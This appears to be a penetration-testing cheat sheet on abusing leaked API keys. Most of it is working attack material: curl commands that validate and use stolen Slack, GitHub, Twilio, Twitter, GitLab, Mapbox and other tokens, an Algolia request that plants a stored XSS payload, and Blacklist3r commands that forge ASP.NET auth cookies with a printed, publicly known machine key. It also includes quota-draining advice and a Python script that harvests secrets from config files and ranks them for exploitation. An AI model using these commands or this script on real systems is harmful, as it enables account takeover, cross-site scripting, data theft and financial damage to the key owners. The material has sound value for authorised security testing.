API Key Leaks

An API key is a unique identifier used to authenticate requests associated with a project or account. Developers sometimes hardcode keys in source, configuration files or mobile apps, or leave them in public repositories and shares, where anyone can find and reuse them.

Tools

Exploit

The following commands can be used to verify a leaked token, take over the associated account, or extract personal information from the API. Run them only against keys you are authorised to test; several of them make authenticated calls that show up in the provider's audit logs.

Google Maps

Use: https://github.com/ozguralp/gmapsapiscanner/

Impact:

  • Consuming the company's monthly quota, or over-billing it through unauthorised use of the service, causing financial damage
  • Conducting a denial of service against the service: if a maximum-bill or quota cap is configured in the Google account, exhausting it makes the company's own requests fail

Algolia

curl --request PUT \
  --url https://<application-id>-1.algolianet.com/1/indexes/<example-index>/settings \
  --header 'content-type: application/json' \
  --header 'x-algolia-api-key: <example-key>' \
  --header 'x-algolia-application-id: <example-application-id>' \
  --data '{"highlightPreTag": "<script>alert(1);</script>"}'

Changing index settings requires a key with write permission on the index; a search-only key returns an authorisation error. The payload above turns the highlight tag into a stored XSS for every client that renders Algolia search results without escaping.

Slack API Token

curl -sX POST "https://slack.com/api/auth.test?token=xoxp-TOKEN_HERE&pretty=1"

Facebook Access Token

curl "https://developers.facebook.com/tools/debug/accesstoken/?access_token=ACCESS_TOKEN_HERE&version=v3.2"

The URL must be quoted, otherwise the shell treats the & as a background operator and drops the version parameter.

Github client id and client secret

curl 'https://api.github.com/users/whatever?client_id=xxxx&client_secret=yyyy'

GitHub has deprecated passing OAuth app credentials as query parameters; if the call above is rejected, send the same client_id:client_secret pair as HTTP Basic credentials with curl's -u option instead. A valid pair is confirmed by the higher rate limit reported in the X-RateLimit-Limit response header.

Twilio Account_sid and Auth token

curl -X GET 'https://api.twilio.com/2010-04-01/Accounts.json' -u ACCOUNT_SID:AUTH_TOKEN

Twitter API Secret

curl -u 'API key:API secret key' --data 'grant_type=client_credentials' 'https://api.twitter.com/oauth2/token'

Twitter Bearer Token

curl --request GET --url https://api.twitter.com/1.1/account_activity/all/subscriptions/count.json --header 'authorization: Bearer TOKEN'

Gitlab Personal Access Token

curl "https://gitlab.example.com/api/v4/projects?private_token=<your_access_token>"

HockeyApp API Token

curl -H "X-HockeyAppToken: ad136912c642076b0d1f32ba161f1846b2c" https://rink.hockeyapp.net/api/2/apps/2021bdf2671ab09174c1de5ad147ea2ba4

Auth Bypass using pre-published Machine Key

By default, ASP.NET creates a Forms Authentication ticket containing a username, the time the ticket was issued and the time it expires. So all that is needed to forge a forms authentication token is a valid username and the machine key. If that machine key was copied from documentation, a sample project or a public repository, anyone who has seen it can sign cookies the application will trust.

That machine key is used for encryption and decryption of forms authentication cookie data and view-state data, and for verification of out-of-process session state identification.

Example of a machineKey from https://docs.microsoft.com/en-us/iis/troubleshoot/security-issues/troubleshooting-forms-authentication.

<machineKey validationKey="87AC8F432C8DB844A4EFD024301AC1AB5808BEE9D1870689B63794D33EE3B55CDB315BB480721A107187561F388C6BEF5B623BF31E2E725FC3F3F71A32BA5DFC" decryptionKey="E001A307CCC8B1ADEA2C55B1246CDCFE8579576997FF92E7" validation="SHA1" />

Exploit with Blacklist3r

# decrypt cookie
AspDotNetWrapper.exe --keypath C:\MachineKey.txt --cookie XXXXXXX_XXXXX-XXXXX --decrypt --purpose=owin.cookie --valalgo=hmacsha512 --decalgo=aes

# encrypt cookie (edit Decrypted.txt first)
AspDotNetWrapper.exe --decryptDataFilePath C:\DecryptedText.txt

The validation and decryption algorithms passed to --valalgo and --decalgo must match the application's machineKey configuration (the example key above uses validation="SHA1"), otherwise the decrypt step fails.

Mapbox API Token

A Mapbox API token is a JWT-like value whose first segment names the token class. If it begins with sk (a secret token), jackpot. If it begins with pk (public) or tk (temporary), it is not worth your time.

# Check token validity
curl "https://api.mapbox.com/tokens/v2?access_token=YOUR_MAPBOX_ACCESS_TOKEN"

# List all tokens associated with an account (only works if the token is a secret token (sk) with the appropriate scope)
curl "https://api.mapbox.com/tokens/v2/MAPBOX_USERNAME_HERE?access_token=YOUR_MAPBOX_ACCESS_TOKEN"
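The curl one-liners above each assume you already know which provider a leaked string belongs to. As an added example (not code from the original page or from any of the tools it links), the script below does the triage step that precedes them: it scans a constructed .env file for the key formats discussed on this page, decodes the payload of Mapbox tokens offline to distinguish sk from pk/tk before any API call is made, and emits the page's verification command for providers whose check needs nothing but the token. The prefix regexes, the Mapbox claim names "u" and "a", the gitlab.example.com host and every sample value are assumptions for illustration, not vendor specifications or real credentials.

```python
import base64
import json
import re

# Heuristic prefix patterns for the key formats discussed on this page.
# Assumptions drawn from each service's public token conventions, not
# vendor specifications; tune them for your own corpus.
TOKEN_PATTERNS = {
    "google_api_key": re.compile(r"\bAIza[0-9A-Za-z_-]{35}\b"),
    "slack_token": re.compile(r"\bxox[abprs]-[0-9A-Za-z-]{10,}\b"),
    "twilio_account_sid": re.compile(r"\bAC[0-9a-f]{32}\b"),
    "gitlab_pat": re.compile(r"\bglpat-[0-9A-Za-z_-]{20}\b"),
    # Mapbox tokens look like <sk|pk|tk>.<base64url payload>.<signature>
    "mapbox_token": re.compile(r"\b(?:sk|pk|tk)\.[0-9A-Za-z_-]+\.[0-9A-Za-z_-]+"),
}

# Verification commands taken from this page; only providers whose check
# needs nothing but the token itself are listed (Twilio also needs the auth token).
VERIFY_COMMANDS = {
    "slack_token": 'curl -sX POST "https://slack.com/api/auth.test?token={token}&pretty=1"',
    "gitlab_pat": 'curl "https://gitlab.example.com/api/v4/projects?private_token={token}"',
    "mapbox_token": 'curl "https://api.mapbox.com/tokens/v2?access_token={token}"',
}


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _mapbox(prefix: str, username: str) -> str:
    """Build a constructed Mapbox-style token. The claim names "u" (username)
    and "a" (token id) are assumptions, and the signature is a placeholder."""
    payload = _b64url(json.dumps({"u": username, "a": "cksample00000"}).encode())
    return f"{prefix}.{payload}.{_b64url(b'constructed-signature')}"


# Constructed sample .env file; none of these values are real credentials.
SAMPLE_CONFIG = f"""
GOOGLE_MAPS_KEY=AIzaSyD{'0' * 32}
SLACK_TOKEN=xoxp-1234567890-1234567890-1234567890-abcdef
TWILIO_ACCOUNT_SID=AC{'0' * 32}
TWILIO_AUTH_TOKEN={'0' * 32}
GITLAB_TOKEN=glpat-{'A' * 20}
MAPBOX_PUBLIC={_mapbox('pk', 'acme-maps')}
MAPBOX_SECRET={_mapbox('sk', 'acme-maps')}
"""


def find_tokens(text: str) -> list[tuple[str, str]]:
    """Return (provider, token) pairs for every pattern hit in text."""
    findings = []
    for provider, pattern in TOKEN_PATTERNS.items():
        for match in pattern.finditer(text):
            findings.append((provider, match.group(0)))
    return findings


def decode_jwt_payload(token: str) -> dict:
    """Decode the middle segment of a Mapbox token offline, without calling the API."""
    segment = token.split(".")[1]
    segment += "=" * (-len(segment) % 4)  # restore base64 padding
    return json.loads(base64.urlsafe_b64decode(segment))


def mapbox_token_class(token: str) -> str:
    """Map the sk/pk/tk prefix to the token class the page describes."""
    return {"sk": "secret", "pk": "public", "tk": "temporary"}[token.split(".", 1)[0]]


def verification_command(provider: str, token: str):
    """Return the page's curl check for this provider, or None if it needs more than the token."""
    template = VERIFY_COMMANDS.get(provider)
    return template.format(token=token) if template else None


def triage(text: str) -> list[tuple[str, str, str]]:
    """Rank findings: Mapbox secret tokens first (they can enumerate the account's
    other tokens), public/temporary Mapbox tokens last, everything else in between."""
    ranked = []
    for provider, token in find_tokens(text):
        priority, note = 1, ""
        if provider == "mapbox_token":
            cls = mapbox_token_class(token)
            claims = decode_jwt_payload(token)
            note = f"{cls} token for user {claims.get('u', '?')}"
            priority = 0 if cls == "secret" else 2
        ranked.append((priority, provider, token, note))
    ranked.sort(key=lambda row: row[0])
    return [(provider, token, note) for _, provider, token, note in ranked]


if __name__ == "__main__":
    for provider, token, note in triage(SAMPLE_CONFIG):
        print(f"{provider:20} {token[:24]}... {note}")
        cmd = verification_command(provider, token)
        if cmd:
            print(f"    verify: {cmd}")
```

Decoding the Mapbox payload locally is deliberate: it tells you the account name and token class from the string alone, so a pk or tk token can be discarded without ever sending it to the provider, and an sk token is escalated before the first network request.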

This post is licensed under CC BY 4.0 by the author.